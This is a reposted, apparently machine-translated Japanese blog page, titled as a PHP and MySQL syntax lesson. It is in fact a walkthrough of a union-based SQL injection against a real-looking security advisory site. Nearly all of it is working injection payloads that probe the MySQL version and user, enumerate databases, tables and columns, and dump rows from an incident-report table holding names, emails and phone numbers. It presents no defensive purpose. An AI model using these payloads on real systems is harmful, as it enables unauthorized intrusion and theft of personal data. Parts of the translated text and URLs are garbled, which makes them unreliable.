検索

ホームページ >バックエンド開発 >PHPチュートリアル >php+mysqlデータベース構文

php+mysqlデータベース構文

WBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWB
WBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBオリジナル
2016-06-23 14:31:411800ブラウズ

1. バージョン http://www.xxx.xxx/document/advisory/detail.php?id=7 を確認し、ord(mid(version(),1,1))>51 が正常を返します。バージョン 4.0 以降であり、union クエリをサポートしています
2。フィールドの数を推測するには、order by を使用して推測するか、union select を使用して 1 つずつ推測することができます
http://www.xxx.xxx/ document/advisory/detail.php?id =7 および 2=4 Union select 1,2,3,4,5,6,7,8,9--
3 データベースのバージョンと現在のユーザーを表示します。 /www.xxx.xxx/document/advisory /detail.php?id=7 および 2=4 Union select 1,user(),version(),4,5,6,7,8,9--
データベース バージョン5.1.35 では、mysql4.1 以降で concat 関数がサポートされていると言われていますが、本当かどうかはわかりません。専門家による検証が必要です。
4. 書き込み権限があるかどうかを確認します
http://www.xxx.xxx/document/advisory/detail.php?id=7 and (select count(*) from MySQL.user)>0-- エラーを返す, 書き込み権限がありません
仕方がありません、テーブルを手動で推測します

5. データベースを確認します。以前は、information_schema.SCHEMATA の制限 0,1 から Union select 1,2,3,SCHEMA_NAME,5,6,n を使用していました
これちょっと残念な点は、このコマンドが使えなかったので、トルコのハッカーのテクニックを学びました
http://www.xxx.xxx/document/ ... Union+select+ concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_schema) ,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns--
すべてのデータベースが正常に検出されました, 外国人ハッカーは普通ではありません。データベースは次のとおりです:
information_schema、Advisory、IR、mad、member、mysql、twcert、vuldb、vulscandb
6. 最も人気のあるものは twcert ライブラリです
http://www.xxx.xxx/document/ .. . Union+ select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+ table_schema= 0x747763657274--
次のテーブルは展開されています
downloadfile, irsys, newsdata,secrpt,secrpt_big5
7 今度は irsys テーブル
http://www.xxx.xxx/document/ が展開されています。 .. Union+ select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+column_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where +table_name= 0x6972737973--
次の列が表示されます
ir_id,name,company,email,tel,pubdate,rptdep,eventtype,eventdesc,machineinfo,procflow,memo,filename,systype,status
8 フィールドの数をクエリします。現時点では、フィールド数をクエリするハッカーはほとんどいません。彼らは、クエリに制限 N,1 を直接使用し、エラーが報告されるまで N を直接使用します。
http://www.xxx.xxx/document/ ... Union+select+concat(0x5B78786F6F5D,CONCAT(count(*)),0x5B78786F6F5D),-3,-3,-3,-3,-3, -3,-3,-3+from+twcert.irsys--
戻り値は 3 で、各列に 3 つのロットがあることを示します
9 フィールドの内容を展開します
http://www.xxx.xxx/document /. .. Union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+0 ,1 --
名前列の最初のフィールドの内容を公開します
http://www.xxx.xxx/document/ ... Union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3 ,- 3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+1,1--
名前列の 2 番目のフィールドの内容を展開します

声明:
この記事の内容はネチズンが自主的に寄稿したものであり、著作権は原著者に帰属します。このサイトは、それに相当する法的責任を負いません。盗作または侵害の疑いのあるコンテンツを見つけた場合は、admin@php.cn までご連絡ください。
前の記事:PHP の使用上のヒント次の記事:PHP の使用上のヒント

関連記事

続きを見る